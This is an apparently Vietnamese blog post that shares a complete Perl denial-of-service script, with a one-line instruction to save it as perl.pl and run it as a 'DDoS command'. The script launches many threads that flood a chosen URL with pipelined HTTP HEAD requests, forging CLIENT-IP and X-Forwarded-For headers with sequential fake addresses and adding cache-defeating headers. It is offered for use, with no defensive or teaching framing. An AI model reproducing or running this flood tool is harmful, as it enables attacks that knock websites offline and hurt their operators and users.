SAVE lịa với  perl.pl

lệnh ddos : perl perl.pl

#!/usr/bin/perl
package control;

my $ip;


sub new {
my ($class,$i) = @_;
$ip = $i;
my $self={};
$ip = $i;
bless $self, $class;
return $self;
}

sub mas {
my ($self,$veces) = @_;
$veces = 1 if($veces eq "");
my ($a,$e,$o,$b) = split(/\./,$ip);
for($as=0;$as<$veces;$as++) {
$b++;
if($b>=255) {$b=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
die("No mas IPs!\n") if($a>=255);
}
$ip = join "",$a,".",$e,".",$o,".",$b;
return $ip;
}

1;

package main;

use Socket;
use IO::Socket::INET;
use threads ('yield',
'exit' => 'threads_only',
'stringify');
use threads::shared;

my $ua = "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0";
my $method = "HEAD";
my $hilo;
my @vals = ('a','b','c','d','e','f','g','h','i','j','k','l','n','o','p','q','r','s','t','u','w','x','y','z',0,1,2,3,4,5,6,7,8,9);
my $randsemilla = "";
for($i = 0; $i < 30; $i++) {
$randsemilla .= $vals[int(rand($#vals))];
}
sub socker {
my ($remote,$port) = @_;
my ($iaddr, $paddr, $proto);
$iaddr = inet_aton($remote) || return false;
$paddr = sockaddr_in($port, $iaddr) || return false;
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) || return false;
return SOCK;
}


sub sender {
my ($max,$puerto,$host,$file) = @_;
my $sock;
while(true) {
my $paquete = "";
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $puerto, Proto => 'tcp');
unless($sock) {
print "\n[x] Unable to connect...\n\n";
sleep(1);
next;
}
for($i=0;$i<$porconexion;$i++) {
$ipinicial = $sumador->mas();
my $filepath = $file;
$filepath =~ s/(\{mn\-fakeip\})/$ipinicial/g;
$paquete .= join "",$method," /",$filepath," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nCLIENT-IP: ",$ipinicial,"\r\nX-Forwarded-For: ",$ipinicial,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
}
$paquete =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
print $sock $paquete;
}
}

sub sender2 {
my ($puerto,$host,$paquete) = @_;
my $sock;
my $sumador :shared;
while(true) {
$sock = &socker($host,$puerto);
unless($sock) {
print "\n[x] Unable to connect...\n\n";
next;
}
print $sock $paquete;
}
}

sub comenzar {
$SIG{'KILL'} = sub { print "Killed...\n"; threads->exit(); };
$url = $ARGV[0];
print "URL: ".$url."\n";
$max = $ARGV[1];
$porconexion = $ARGV[2];
$ipfake = $ARGV[3];
if($porconexion < 1) {
print "[-]Invalid arg 3...\n";
exit;
}
if($url !~ /^http:\/\//) {
die("[x] Invalid URL!\n");
}
$url .= "/" if($url =~ /^http?:\/\/([\d\w\:\.-]*)$/);
($host,$file) = ($url =~ /^http?:\/\/(.*?)\/(.*)/);
$puerto = 80;
($host,$puerto) = ($host =~ /(.*?):(.*)/) if($host =~ /(.*?):(.*)/);
$file =~ s/\s/ /g;
print join "","[!] Launching ",$max," threads!\n";
$file = "/".$file if($file !~ /^\//);
print join "","Target: ",$host,":",$puerto,"\nPath: ",$file,"\n\n";
# entonces toca un paquete unico, no tiene caso que se genere por cada hilo :)...
if($ipfake eq "") {
# envio repetitivo
my $paquetebase = join "",$method," /",$file," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
$paquetesender = "";
$paquetesender = $paquetebase x $porconexion;
$paquetesender =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender2', ($puerto,$host,$paquetesender));
}
} else {
# envio con ip...
$sumador = control->new($ipfake);
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender', ($porconexion,$puerto,$host,$file));
}
}
print "[-] Launched!\n";
for($v=0;$v<$max;$v++) {
if ($thr[$v]->is_running()) {
sleep(3);
$v--;
}
}
print "Fin!\n";
}


if($#ARGV > 2) {
comenzar();
} else {
die("Use: script.pl [url] [Connections] [Requests per connection] [Initial false IP (optional)]\n");
}

- 0 bình luận lượt xem

http://www.plusthuthuat.com/2015/08/share-code-ddos-perl.html

BÌNH LUẬN (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé